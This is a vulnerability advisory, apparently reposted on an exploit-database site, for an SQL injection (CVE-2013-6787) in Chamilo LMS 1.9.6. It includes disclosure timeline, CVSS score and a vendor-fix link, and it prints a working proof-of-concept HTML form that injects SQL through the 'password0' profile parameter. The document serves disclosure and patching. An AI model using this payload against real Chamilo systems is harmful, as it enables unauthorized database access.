[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Chamilo LMS 1.9.6 SQL Injection Vulnerability

Author
High-Tech Bridge
Risk
[
Security Risk High
]
0day-ID
0day-ID-21577
Category
web applications
Date add
27-11-2013
CVE
CVE-2013-6787
Platform
php
Vendor: Chamilo Association
Vulnerable Version(s): 1.9.6 and probably prior
Tested Version: 1.9.6
Advisory Publication:  November 6, 2013  [without technical details]
Vendor Notification: November 6, 2013 
Vendor Patch: November 9, 2013 
Public Disclosure: November 27, 2013 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-6787
Risk Level: Medium 
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Chamilo LMS, which can be exploited to perform SQL Injection attacks.


1) SQL Injection in Chamilo LMS: CVE-2013-6787

The vulnerability exists due to insufficient validation of "password0" HTTP POST parameter passed to "/main/auth/profile.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The following exploitation example displays version of MySQL server:

<form action="http://[host]/main/auth/profile.php" method="post" name="main">
<input type="hidden" name="password0"  value="' OR substring(version(),1,1)=5 -- ">
<input type="hidden" name="password1"  value="password">
<input type="hidden" name="password2"  value="password">
<input type="hidden" name="apply_change"  value="">
<input type="hidden" name="firstname"  value="first_name">
<input type="hidden" name="lastname"  value="last_name">
<input type="hidden" name="username"  value="username">
<input type="hidden" name="official_code"  value="USER">
<input type="hidden" name="phone"  value="">
<input type="hidden" name="language"  value="">
<input type="hidden" name="extra_mail_notify_invitation"  value="">
<input type="hidden" name="extra_mail_notify_message"  value="">
<input type="hidden" name="extra_mail_notify_group_message"  value="">
<input type="hidden" name="_qf__profile"  value="">
<input type="hidden" name=""  value="">
<input type="submit" id="btn">
</form>


Successful exploitation of this vulnerability requires that the application is configured during installation not to encrypt users' passwords ("Encryption method" option is set to "none").

-----------------------------------------------------------------------------------------------

Solution:

Edit the source code and apply changes according to vendor's instructions:.

More Information:
https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-10-2013-11-06-Moderate-risk-SQL-Injection-in-specific-unrecommended-case

#  0day.today [2024-12-26]  #